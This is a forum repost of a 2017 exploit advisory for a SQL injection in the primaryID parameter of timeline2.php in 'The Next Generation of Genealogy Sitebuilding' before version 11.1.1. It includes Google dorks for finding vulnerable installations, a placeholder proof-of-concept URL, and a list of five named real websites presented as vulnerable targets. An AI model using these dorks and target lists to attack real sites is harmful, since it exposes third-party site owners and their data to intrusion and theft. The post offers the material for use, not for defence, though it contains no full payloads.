Jump to content
Fi8sVrs

The Next Generation Of Genealogy Sitebuilding SQL Injection

By Fi8sVrs, in Exploituri

Recommended Posts

  • Active Members
Fi8sVrs Rookie

Fi8sVrs

Posted
  • Active Members
Posted

The Next Generation of Genealogy Sitebuilding versions prior to 11.1.1 suffer from a remote SQL injection vulnerability.

  

========================================================================================== 
 The Next Generation of Genealogy Sitebuilding SQL Injection Vulnerability 
========================================================================================== 

:-------------------------------------------------------------------------------------------------------------------------: 
: # Exploit Title : The Next Generation of Genealogy Sitebuilding SQL Injection Vulnerability  
: # Date : 29th August 2017  
: # Author : X-Cisadane 
: # CMS Name :  The Next Generation of Genealogy Sitebuilding 
: # Version : < 11.1.1
: # CMS Developer : http://www.tngsitebuilding.com/
: # Category : Web Application 
: # Vulnerability : SQL Injection 
: # Tested On : SQLMap 1.1.8.16#dev (Windows 7 64-bit) 
: # Greetz to : X-Code YogyaFree, ExploreCrew, CodeNesia, Bogor Hackers Community, Borneo Crew, Depok Cyber, Mantan 
:-------------------------------------------------------------------------------------------------------------------------: 

A SQL Injection Vulnerability has been discovered in the The Next Generation of Genealogy Sitebuilding CMS.
The vulnerability allows remote attackers to execute own SQL Commands by usage of a vulnerable serivce value. 
The vulnerability is located in the primaryID value of the timeline2.php file. 
Remote attackers are able to execute own SQL Commands by usage of a GET method request with manipulated primaryID value. 
Remote attackers are able to read database information by execution of own SQL Commands. 
  
DORKS (How to find the target) : 
================================  
inurl:/timeline2.php?primaryID= 
Or "powered by The Next Generation of Genealogy Sitebuilding" 
Or use your own Google Dorks :) 

Proof of Concept  
================  

SQL Injection 
PoC :  
http://[Site]/[Path]/timeline2.php?primaryID=['SQLi]  

Screenshot (PoC) : 
https://s20.postimg.org/asdu29rwt/Screenshot_99.png 
https://s20.postimg.org/wsu6iwakt/Screenshot_100.png 

Example of Vuln Sites : 
http://1820settlers.co.uk/genealogy/timeline2.php?primaryID=['SQLi] 
http://lythgoes.net/genealogy/timeline2.php?primaryID=['SQLi] 
http://henrygrowfamily.org/timeline2.php?primaryID=['SQLi] 
http://www.ennever.com/timeline2.php?primaryID=['SQLi] 
http://mcbridehistory.com/timeline2.php?primaryID=['SQLi] 

... etc ...

Source: https://packetstormsecurity.com/files/143954/The-Next-Generation-Of-Genealogy-Sitebuilding-SQL-Injection.html

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...